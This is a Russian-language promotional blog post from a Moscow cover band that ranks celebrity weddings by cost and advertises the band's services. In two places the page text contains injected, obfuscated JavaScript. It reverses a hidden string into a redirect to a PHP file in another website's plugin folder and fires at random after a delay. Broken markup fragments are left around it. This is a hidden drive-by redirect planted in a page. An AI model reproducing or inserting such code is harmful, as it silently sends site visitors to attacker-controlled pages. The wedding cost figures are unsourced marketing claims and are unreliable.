Самая крутая свадьба


Содержание

Самая крутая свадьба – это самое торжество, которое попадает в рейтинги невероятных событий а некоторые из них еще и в книгу Гиннесса. Для того, чтобы устроить такое пирование, необходимо огромное количество бюджета и невероятная организация, которая выполняется в течении месяцев. Все должно быть идеально!

Вас приветствует Elim’s Band, мой уважаемый читатель! Интересно же быть в курсе того, о чем не услышишь каждый день в новостях. И здесь мы расскажем Вам о самый невероятных, торжественный и просто крутых свадьбах мира.
Вперед!?

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top: 65px;»>ТОП самая крутая свадьба мира

  • Ваниши Миталли и Амит Бхатиа – поистине крутая свадьба лидирует в ТОПе из-за яркости и пышности в 78 миллионов долларов, куда вошли недельное торжество во Франции, приглашения для всех гостей в серебряной шкатулочке, частные самолеты, музыкальное сопровождение певицей Kylie Minogue и шикарный салют.
  • Диана Спенсер и Принц Чарльз – для этой прекрасной пары крутая свадьба обошлась в 48 миллионов долларов, включая в себя стеклянную катеру, шикарное платье с величественным шлейфом, множество цветов и полная безопасность.
  • Мелания Кнавс и Дональд Трамп – огромный торт с золотыми украшениями (возможно, что украшения были из настоящего материала), аренда клуба, который вместил 450 гостей, неиссякаемое количество самого дорогого шампанского и многое другое стоило будущему президенту США 45 миллионов долларов;
  • Принцесса Саламе и Шейх Мохаммед бин Аль Мактум – местом проведения был стадион, потому как приглашенных гостей оказалось 20 000 человек, пирование с шикарным застольем обошлось новоиспеченной семье в 44 с половиной миллиона долларов;
  • Кейт Миддлтон и Принц Уильям – королевское мероприятие в Букингемском дворце обошлась молодоженам в 34 миллиона долларов (при этом только цветов было приобретено на сумму в 300 000 долларов).

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top: 65px;»>Крутая свадьба с Elim’s Band

Мы московская кавер-группа, которая покоряет своими сердцами, самоотдачей, качеством исполнения различных ХИТов со всего мира с 2012го года. Elim’s Band занимает ТОПовые места среди других кавер-групп Москвы.

Если нет возможности пригласить на торжество настоящую звезду, то мы готовы исполнить все Ваши любимые композиции так, что разочарования, уж поверьте, не будет! Наши профессиональные музыканты и вокалисты станут отрадой даже для самых скрупулезных гостей, а танцевать и подпевать будут даже самые стеснительные! Звоните прямо сейчас ?

Узнать больше про кавер-группу Elim’s Band ?

Пригласить кавер группу на свадьбу или корпоратив?

Статьи которые Вам могут быть интересны:

Больше видео тут.